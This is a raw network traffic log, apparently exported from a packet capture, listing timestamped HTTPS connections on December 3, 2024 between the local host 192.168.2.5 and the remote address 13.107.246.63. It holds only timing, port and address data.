                                Dec 3, 2024 17:51:33.091646910 CET4435002613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.091871977 CET50026443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.092051029 CET50026443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.092067003 CET4435002613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.817120075 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.821743011 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.821760893 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.822231054 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.822237015 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.916999102 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.006669044 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.006697893 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.007158995 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.007165909 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.254081964 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.307996988 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.308092117 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.310688972 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.950494051 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.950942993 CET50046443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.950948000 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.241393089 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.241460085 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.247488976 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.247574091 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.249845982 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.251620054 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.251687050 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.267333984 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.279334068 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.287329912 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.290234089 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.290235043 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.290374041 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.310458899 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.310646057 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.310651064 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.321039915 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.321132898 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.330662012 CET50044443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.330688953 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.330705881 CET50046443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.371654987 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.371679068 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.371691942 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.371700048 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.372118950 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.372123003 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.372133017 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.372136116 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.372186899 CET50046443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.372212887 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.372225046 CET50046443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.372231960 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.373362064 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.373389006 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.373402119 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.373408079 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.373701096 CET50044443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.373719931 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.373728037 CET50044443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.373923063 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.373955011 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.379513979 CET50044443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.385396004 CET50048443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.385431051 CET4435004813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.386441946 CET50049443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.386468887 CET4435004913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.387870073 CET50050443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.387881041 CET4435005013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.388200998 CET50048443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.388212919 CET50049443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.388230085 CET50050443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.388385057 CET50048443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.388397932 CET4435004813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.389311075 CET50051443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.389318943 CET4435005113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.389472961 CET50052443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.389497042 CET4435005213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.389597893 CET50049443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.389611006 CET4435004913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.389624119 CET50050443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.389638901 CET4435005013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.389698982 CET50051443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.389816046 CET50051443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.389817953 CET50052443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.389825106 CET4435005113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.389846087 CET50052443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.389861107 CET4435005213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.142467022 CET4435005013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.147747993 CET4435005113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.148262024 CET50050443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.148291111 CET4435005013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.148746014 CET50050443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.148751020 CET4435005013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.149208069 CET50051443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.149229050 CET4435005113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.149593115 CET50051443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.149597883 CET4435005113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.291217089 CET4435005213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.298104048 CET4435004913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.316226959 CET4435004813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.345796108 CET50052443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.345884085 CET50049443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.417474985 CET50052443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.417496920 CET4435005213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.417536020 CET50049443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.417548895 CET4435004913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.417980909 CET50052443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.417985916 CET4435005213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.418045044 CET50049443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.418051004 CET4435004913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.419789076 CET50048443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.419817924 CET4435004813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.420161963 CET50048443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.420169115 CET4435004813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.588545084 CET4435005013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.588567972 CET4435005013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.590734959 CET4435005013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.594341993 CET4435005113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.594366074 CET4435005113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.598990917 CET4435005113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.603333950 CET4435005113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.603334904 CET4435005013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.603565931 CET50050443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.603566885 CET50051443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.610517979 CET50051443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.613181114 CET50050443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.624495029 CET50050443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.624509096 CET4435005013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.624520063 CET50050443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.624524117 CET4435005013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.624610901 CET50051443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.624623060 CET4435005113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.624651909 CET50051443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.624658108 CET4435005113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.707818031 CET50053443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.707865953 CET4435005313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.718055010 CET50053443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.726878881 CET50053443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.726893902 CET4435005313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.726928949 CET50054443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.726989031 CET4435005413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.727102995 CET50054443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.727169037 CET50054443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.727189064 CET4435005413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.796827078 CET4435005213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.796900988 CET4435005213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.799340010 CET50052443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.800440073 CET50052443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.800457954 CET4435005213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.800472021 CET50052443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.800479889 CET4435005213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.805891037 CET4435004913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.805917025 CET4435004913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.805996895 CET4435004913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.808224916 CET50049443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.808686018 CET50055443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.808712006 CET4435005513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.809310913 CET50055443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.809668064 CET50049443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.809689999 CET4435004913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.809701920 CET50049443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.809708118 CET4435004913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.810147047 CET50055443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.810158014 CET4435005513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.810270071 CET4435004813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.810337067 CET4435004813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.811271906 CET50048443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.812316895 CET50048443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.812334061 CET4435004813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.812345028 CET50048443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.812350035 CET4435004813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.814549923 CET50056443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.814587116 CET4435005613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.827023029 CET50056443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.827366114 CET50056443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.827390909 CET4435005613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.857673883 CET50057443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.857717037 CET4435005713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:48.862135887 CET50057443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.970791101 CET50057443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:48.970818996 CET4435005713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.602205038 CET4435005413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.602766037 CET4435005313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.608892918 CET4435005713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.624906063 CET4435005613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.644251108 CET50054443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:50.678322077 CET50056443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:50.678340912 CET4435005613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.678395033 CET50053443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:50.678420067 CET4435005313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.678881884 CET50056443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:50.678888083 CET4435005613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.679176092 CET50053443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:50.679181099 CET4435005313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.681091070 CET50054443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:50.681113005 CET4435005413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.681523085 CET50054443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:50.681529999 CET4435005413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.682779074 CET50057443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:50.682802916 CET4435005713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.683185101 CET50057443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:50.683193922 CET4435005713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.683279037 CET4435005513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.694039106 CET50055443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:50.694050074 CET4435005513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:50.694551945 CET50055443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:50.694560051 CET4435005513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.046354055 CET4435005713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.048638105 CET4435005413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.049757957 CET4435005713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.052021027 CET4435005313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.052047968 CET4435005313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.052057981 CET50057443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.052107096 CET4435005313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.052241087 CET4435005413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.062448025 CET4435005613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.066256046 CET4435005613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.068440914 CET50053443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.068464041 CET50054443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.068543911 CET50056443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.128840923 CET4435005513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.131886005 CET4435005513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.147046089 CET50057443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.147073030 CET4435005713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.147087097 CET50057443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.147093058 CET4435005713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.147326946 CET4435005513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.148324013 CET50056443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.148345947 CET4435005613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.148358107 CET50056443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.148364067 CET4435005613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.148721933 CET50055443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.150962114 CET50055443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.150978088 CET4435005513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.150990963 CET50055443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.150995970 CET4435005513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.152997971 CET50054443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.153036118 CET4435005413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.153053999 CET50054443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.153064966 CET4435005413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.155056953 CET50053443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.155061960 CET4435005313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.155071974 CET50053443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.155076027 CET4435005313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.259669065 CET50058443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.259711027 CET4435005813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.260915995 CET50059443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.260967016 CET4435005913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.262526989 CET50060443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.262573004 CET4435006013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.263525963 CET50061443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.263556957 CET4435006113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.269308090 CET50062443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.269325972 CET4435006213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.270582914 CET50058443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.270596027 CET50059443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.270597935 CET50060443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.270648956 CET50062443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.270648956 CET50061443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.276760101 CET50062443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.276781082 CET4435006213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.276855946 CET50061443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.276878119 CET4435006113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.276916027 CET50058443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.276932955 CET4435005813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.276994944 CET50059443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.277018070 CET4435005913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:51.277108908 CET50060443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:51.277117968 CET4435006013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.041235924 CET4435006013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.119565010 CET4435005813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.132070065 CET4435006113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.132236958 CET50060443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:53.187465906 CET4435005913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.195969105 CET4435006213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.225255013 CET50062443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:53.225270987 CET4435006213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.225660086 CET50062443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:53.225665092 CET4435006213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.225933075 CET50059443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:53.225964069 CET4435005913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.226357937 CET50059443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:53.226366043 CET4435005913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.226672888 CET50060443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:53.226679087 CET4435006013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.226988077 CET50060443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:53.226990938 CET4435006013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.227473974 CET50058443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:53.227484941 CET4435005813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.227839947 CET50058443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:53.227844000 CET4435005813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.230992079 CET50061443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:53.231017113 CET4435006113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.231374979 CET50061443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:53.231381893 CET4435006113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.543756008 CET4435006013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.546793938 CET4435006013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:53.547331095 CET50060443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.404337883 CET4435007913.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.404347897 CET4435007913.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.411305904 CET50077443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.411305904 CET50077443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.411324024 CET4435007713.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.411330938 CET4435007713.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.503900051 CET50082443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.503937960 CET4435008213.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.504041910 CET50082443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.504352093 CET50082443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.504365921 CET4435008213.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.506000042 CET50083443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.506032944 CET4435008313.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.506051064 CET50084443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.506087065 CET4435008413.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.506647110 CET50085443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.506694078 CET4435008513.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.506700993 CET50083443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.506721973 CET50084443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.506885052 CET50083443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.506905079 CET4435008313.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.506970882 CET50085443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.507260084 CET50084443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.507272005 CET4435008413.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.507467031 CET50085443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.507492065 CET4435008513.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.682857990 CET4435008113.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.682897091 CET4435008113.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.682965994 CET4435008113.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.684878111 CET50081443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.695785046 CET50081443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.695816040 CET4435008113.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.695832968 CET50081443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.695839882 CET4435008113.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.699965954 CET50086443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.700010061 CET4435008613.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:04.718066931 CET50086443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.719439030 CET50086443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:04.719466925 CET4435008613.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.536370993 CET4435008313.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.537091017 CET4435008513.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.612504959 CET50083443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:06.612524986 CET4435008313.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.613125086 CET50083443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:06.613130093 CET4435008313.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.613389969 CET50085443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:06.613411903 CET4435008513.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.613755941 CET50085443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:06.613759995 CET4435008513.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.655714035 CET4435008213.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.657836914 CET4435008413.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.699428082 CET50082443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:06.699448109 CET4435008213.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.699914932 CET50082443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:06.699919939 CET4435008213.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.700148106 CET50084443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:06.700174093 CET4435008413.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.700509071 CET50084443192.168.2.513.107.246.63
                                Dec 3, 2024 17:52:06.700515985 CET4435008413.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.832922935 CET4435008613.107.246.63192.168.2.5
                                Dec 3, 2024 17:52:06.915823936 CET50086443192.168.2.513.107.246.63
